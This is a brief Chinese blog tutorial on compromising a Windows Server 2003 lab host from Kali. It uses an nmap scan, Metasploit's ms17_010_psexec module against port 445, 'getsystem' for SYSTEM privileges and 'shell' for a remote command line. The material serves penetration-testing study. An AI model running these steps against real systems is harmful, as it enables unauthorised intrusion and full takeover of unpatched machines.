kali渗透windows Server 2003

日期 2019-05-26 默认分类 作者 梁承龙 共0评论

post-bg.jpg

一、首先先扫描一下靶机
nmap -sS -sV -O -Pn 192.168.18.133

其中sS是半开放扫描,sV是扫描版本号,O是扫描操作系统,Pn是不进行ping,会快一点。

扫描.png

可以看到有445端口,且是windows server 2003。

二、使用msfconsole

开启msfconsole。使用模块ms17_010_psexec。可以show option查看

开启msfconsole使用模块.png

只需要设置RHOST目标主机即可。那么就设置.set RHOST 192.168.18.133。设置好后直接执行run

123.png

提权命令getsystem

使用getsystem提升当前进城执行账户微system用户,拿到系统最高权限

getsystem

shell命令
获取目标主机的远程命令行shell

shell.png

人生在世,错别字在所难免,无需纠正。